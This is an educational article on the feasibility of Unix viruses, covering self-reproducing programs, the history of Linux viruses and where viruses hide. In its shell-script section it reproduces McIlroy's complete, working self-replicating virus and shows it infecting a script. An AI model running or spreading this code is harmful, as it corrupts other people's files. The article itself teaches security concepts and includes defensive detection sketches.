kernelthread.com

A Taste of Computer Security

© Amit Singh. All Rights Reserved. Written in June 2004


Viruses on Unix

Unix has the reputation of being "not so buggy", and of being a good maintainer of system sanctity via good protection mechanisms (in particular, a supervisor mode that is supposed to be very hard to attain for a non-super-user).

Feasibility

You do not need to exploit bugs in an operating system to have viruses. Essentially all operating systems provide prerequisites for supporting a computer virus. Similarly, supervisor mode is not necessary for viral activity, and in any case, supervisor mode may be obtained through virus-unrelated security holes. Moreover, the number of reported viruses on a particular platform is not an indicator of the feasibility (either way) of viruses on that platform.

A typical definition of a computer virus might have aspects such as the following:

Note that none of the above is automatically ruled out on Unix.

Self-Reproduction

A common buzz-phrase heard in the context of computer viruses is that they are self-reproducing. Ken Thompson presents a delightful discussion on software self-reproduction in Reflections on Trusting Trust. Thompson says that: "In college ... One of the favorites [programming exercises] was to write the shortest self-reproducing program [in FORTRAN]".

Now, if self-reproduction is looked upon as purely a programming exercise, the ease of writing such code would be related to the syntax of the programming language being used. Consider the following C one-liner (source) that prints itself (broken into multiple lines to fit):

    main(){char*p="main(){char*p=%c%s%c;
    (void)printf(p,34,p,34,10);}%c";
    (void)printf(p,34,p,34,10);}
    ...
    % gcc -o pself pself.c
    % ./pself | diff /dev/stdin ./pself.c
    %

Along similar lines, here is one in Perl (source):

    $s='$s=%c%s%c;printf($s,39,$s,39);';printf($s,39,$s,39);
    ...
    % perl pself.pl | diff /dev/stdin ./pself.pl
    %

The following is a self-reproducing shell-script (source):

    E='E=%s;printf "$E" "\x27$E\x27"';printf "$E" "'$E'"
    ...
    % /bin/sh pself.sh | diff /dev/stdin ./pself.sh
    %

Finally, here is a C program that reproduces itself backwards (source), again broken into multiple lines to fit:

    main(){int i;char *k;char a[]="main(){int i;char *k;
    char a[]=%c%s%c;k=(char *)malloc(220);for(i=0;i<219;i++)
    {k[i]=a[218-i];}*(k+219)=0;strcpy(a,k);a[183]=k[184];a[184]
    =k[183];a[185]=k[184];a[186]=k[185];a[187]=k[184];a[188]=k[
    187];printf(a,34,k,34);}";k=(char*)malloc(220);for(i=0
    ;i<219;i++){k[i]=a[218-i];}*(k+219)=0;strcpy(a,k);a[183]
    =k[184];a[184]=k[183];a[185]=k[184];a[186]=k[185];a[187]=k[
    184];a[188]=k[187];printf(a,34,k,34);}
    ...
    % gcc -o reflect reflect.c
    % ./reflect | perl -e '$r = reverse(<STDIN>); print $r;'\
        | diff /dev/stdin ./reflect.c
    %

The point is that it is practical to write self-reproducing code in high-level languages. In particular, such programs could be made to carry arbitrary baggage, such as viral code. However, note that real-life viruses usually do not reproduce themselves syntactically.

First *nix Virus?

"McAfee detects first Linux Virus."
— IT headlines, February 7, 1997

Headlines screamed "Linux virus" on February 7, 1997, as it was "proved" that a virus for Linux could be written. The virus source was posted on several sites, after the compressed tar file had been byte swapped, uuencoded and rot13'ed, apparently so that curious novices could not inadvertently use it. The virus was blissfully called Bliss. "Vaccines" appeared promptly from various sources on the Internet, including an all too happy McAfee.

Note that there was an earlier "virus" for Linux, called Staog, that used buffer overflow vulnerabilities in mount and tip, and a bug in suidperl, to try to gain root access.

In any case, Unix viruses are not that new, and they were not invented in 1997. We saw earlier that Cohen created some experimental Unix viruses. Here is a note from Dennis Ritchie on Unix viruses:

"A few years ago Tom Duff created a very persistent UNIX virus. At that point we had about 10-12 8th or 9th edition VAX 750s networked together. The virus lived in the slack space at the end of the executable, and changed the entry point to itself. When the program was executed, it searched the current directory, subdirectories, /bin, /usr/bin for writable, uninfected files and then infected them if there was enough space."

The Crux Of The Matter

It should not be any harder to write a virus for Unix than for any other system. However, deploying or spreading a virus involves different logistics on Unix, and is harder, than on Windows. We discuss some relevant differences between Unix and Windows in a later section.

How to hide?

There are several candidates on Unix for being a virus's runtime environment. Similarly, there are several places for a virus to hide on Unix.

The Unix Shells

Shell scripts are a powerful way to program. Unix shells are ubiquitous, accessible, and provide homogeneity across otherwise heterogeneous systems (for example, systems with differing application binary interfaces). Shell scripts are simply text files, and lend themselves easily to modification.

M. Douglas McIlroy developed a simple shell-script virus, a 150-byte version of which he called Traductor simplicimus. The code for McIlroy's virus is reproduced below:

    for i in * #virus#
    do case "`sed 1q $i`" in
       "#!/bin/sh") grep '#virus#' $i >/dev/null ||
          sed -n '/#virus#/,$p' $0 >>$i
       esac
    done 2>/dev/null

Now, given that we have a shell-script, infected.sh, infected with this virus, consider an example of the infection spreading:

    % ls
    infected.sh hello.sh
    % cat hello.sh
    #!/bin/sh
    echo "Hello, World!"
    % ./infected.sh
    /* whatever output it is supposed to produce */
    % cat hello.sh
    #!/bin/sh
    echo "Hello, World!"
    for i in * #virus#
    do case "`sed 1q $i`" in
       "#!/bin/sh") grep '#virus#' $i >/dev/null ||
          sed -n '/#virus#/,$p' $0 >>$i
       esac
    done 2>/dev/null
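The marker test that the virus uses to avoid reinfecting a file works just as well in the other direction. The following is a minimal sketch, not taken from McIlroy's paper, of a scanner that lists the /bin/sh scripts in a directory that already carry the #virus# marker. The function name list_marked is an assumption made for illustration.

```shell
#!/bin/sh
# list_marked DIR
# Print the base names of regular files in DIR whose first line is
# exactly "#!/bin/sh" and that contain the marker string "#virus#".
# list_marked is a hypothetical helper name, not part of any real tool.
list_marked() {
    dir=$1
    for f in "$dir"/*; do
        # Skip directories and the literal pattern of an empty directory.
        [ -f "$f" ] || continue
        # Same first-line test that the virus applies to its candidates.
        [ "$(sed 1q "$f")" = "#!/bin/sh" ] || continue
        # Same marker test that the virus uses to detect prior infection.
        if grep -F -q '#virus#' "$f"; then
            printf '%s\n' "${f##*/}"
        fi
    done
    return 0
}
```

Calling list_marked . in the directory from the session above would be expected to report hello.sh once it has been infected. A scanner this simple only recognizes this one marker, and a virus could trivially use a different one.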

McIlroy called viruses "a corollary of universality." He concluded that viruses are a natural consequence of stored-program computing, and pointed out that "no general defense [against viruses] within one domain of reference is possible ..."

Jim Reeds called /bin/sh "the biggest UNIX security loophole."

Binary Executables

A virus writer may want his virus to hide in a binary executable, for obvious reasons (such files provide more obscure hiding places, and are often more "active"). However, given the diverse nature of different Unix platforms (including different executable formats), modifying an executable might be rather painful to implement. For example, the feasibility and difficulty of injecting a stream of instructions into an executable to modify program execution would depend on the file format.

Instruction injection is not limited to virus creation. It has several legitimate uses. Code profilers could need to insert profiling code in-place. The New Jersey Machine-Code Toolkit offers help in this regard.

The Executable and Linking Format (ELF) is meant to provide developers with a set of binary interface definitions that extend across multiple platforms. ELF is indeed used on several platforms, and is flexible enough to be manipulated creatively, as demonstrated by many. A virus could attach viral code to an ELF file, and re-route control-flow so as to include the viral code during execution.
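Any tool that manipulates an ELF file, legitimate or otherwise, begins by reading the identification bytes at the start of the file. As a minimal sketch (the function name elf_ident is hypothetical), the following reports whether a file starts with the ELF magic number and, if so, the class and byte order recorded in its fifth and sixth bytes:

```shell
#!/bin/sh
# elf_ident FILE
# Print the ELF class and byte order of FILE, or "not ELF" if FILE does
# not start with the magic number 0x7f 'E' 'L' 'F'.
# elf_ident is a hypothetical helper name used only for illustration.
elf_ident() {
    # Dump the first six bytes as one hex string, e.g. "7f454c460201".
    hex=$(od -An -tx1 -N6 "$1" 2>/dev/null | tr -d ' \n')

    case $hex in
        7f454c46*) ;;                          # magic number matches
        *) echo "not ELF"; return 1 ;;
    esac

    # Fifth byte (EI_CLASS): 1 means 32-bit objects, 2 means 64-bit.
    case $hex in
        7f454c4601*) class=ELF32 ;;
        7f454c4602*) class=ELF64 ;;
        *)           class="ELF (unknown class)" ;;
    esac

    # Sixth byte (EI_DATA): 1 means little-endian, 2 means big-endian.
    case $hex in
        7f454c46??01) order=little-endian ;;
        7f454c46??02) order=big-endian ;;
        *)            order="unknown byte order" ;;
    esac

    printf '%s %s\n' "$class" "$order"
}
```

The rest of the header, including the entry point address that a virus would redirect, is laid out differently for the 32-bit and 64-bit classes, which is why the class and byte order have to be read first.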

Jingle Bell: A Simple Virus In C

Jingle Bell (source) is an extremely simple-minded virus written in C. It attaches itself to an executable by appending that executable to a copy of itself and recording the offset at which the original begins. This process repeats itself.

I wrote this "virus" several years ago when I used to work at Bell Laboratories. Hence, the name. The last I heard, it is also available as a user-contributed port in the Plan 9 operating system.

The virus infects the first executable found, if any, on its command line. Other infection policies could be programmed too. The virus would somehow need to be introduced in the system, through a downloaded binary, for example. Assuming that /bin/ls is infected, an infection session is shown below:

    # ls -las
    total 15
       1 drwxr-xr-x   2 root  root   1024 Jan 19 13:33 .
       1 drwxr-xr-x   4 root  root   1024 Jan 19 13:32 ..
       1 -rw-r--r--   1 root  root     75 Jan 19 13:33 hello.c
    # cat hello.c
    #include <stdio.h>
    int main()
    {
        printf("Hello, World!\n");
        exit(0);
    }
    # cc hello.c
    # ls -las
    total 15
       1 drwxr-xr-x   2 root  root   1024 Jan 19 13:36 .
       1 drwxr-xr-x   4 root  root   1024 Jan 19 13:34 ..
      12 -rwxr-xr-x   1 root  root  11803 Jan 19 13:36 a.out
       1 -rw-r--r--   1 root  root     75 Jan 19 13:33 hello.c
    # ./a.out
    Hello, World!
    # ls -las a.out            # This will infect a.out
      29 -rwxr-xr-x   1 root  root  28322 Jan 19 13:38 a.out
    # ./a.out                  # a.out works as before
    Hello, World!
    # cc hello.c -o hello      # compile hello.c again
    # ls -las                  # a.out infected, hello not yet infected
    total 44
       1 drwxr-xr-x   2 root  root   1024 Jan 19 13:40 .
       1 drwxr-xr-x   4 root  root   1024 Jan 19 13:34 ..
      29 -rwxr-xr-x   1 root  root  28322 Jan 19 13:38 a.out
      12 -rwxr-xr-x   1 root  root  11803 Jan 19 13:40 hello
       1 -rw-r--r--   1 root  root     75 Jan 19 13:33 hello.c
    # ./a.out hello            # This should infect hello
    Hello, World!
    # ls -las                  # It indeed does
    total 61
       1 drwxr-xr-x   2 root  root   1024 Jan 19 13:40 .
       1 drwxr-xr-x   4 root  root   1024 Jan 19 13:34 ..
      29 -rwxr-xr-x   1 root  root  28322 Jan 19 13:38 a.out
      29 -rwxr-xr-x   1 root  root  28322 Jan 19 13:40 hello
       1 -rw-r--r--   1 root  root     75 Jan 19 13:33 hello.c

The infection proceeds as expected. Note, however, that an infected program can cause further infection in its own domain only, that is, among the files that the user running it is permitted to modify.
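One way to picture this domain is to ask which executables the current user is actually allowed to modify. The following minimal sketch (the function name writable_executables is an assumption for illustration) lists the executable regular files in a directory that the invoking user could write to:

```shell
#!/bin/sh
# writable_executables DIR
# Print the path of every regular file in DIR that the invoking user can
# both execute and write to. These are the only programs that code
# running as this user could alter.
# writable_executables is a hypothetical helper name.
writable_executables() {
    for f in "$1"/*; do
        [ -f "$f" ] && [ -x "$f" ] && [ -w "$f" ] && printf '%s\n' "$f"
    done
    return 0    # do not propagate the status of the last failed test
}
```

For an ordinary user, a system directory such as /bin would normally yield nothing, whereas for root nearly every executable qualifies. The session above was run as root, which is why the infection could proceed unhindered.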

How to spread?

As stated earlier, writing a virus is one thing; deploying it (seeding the infection and having it spread) is another. A channel or mechanism that a virus uses to spread is called a vector. There is no dearth of potential vectors on Unix (for example, buffer overflow vulnerabilities).

A legitimate and often-asked question follows: if it is perfectly feasible to create viruses for Unix systems, and if potential vectors exist, then why are Unix systems (apparently) virus-free, at least relative to Windows?

This question would be rather easy to deal with if the answer were entirely technical in nature. It is not. An attempt to answer this question would involve looking at numerous intertwined issues: real and imaginary, technical and (mostly) non-technical — historical, circumstantial, social, political, and so on. We look at some of these issues in the final section.
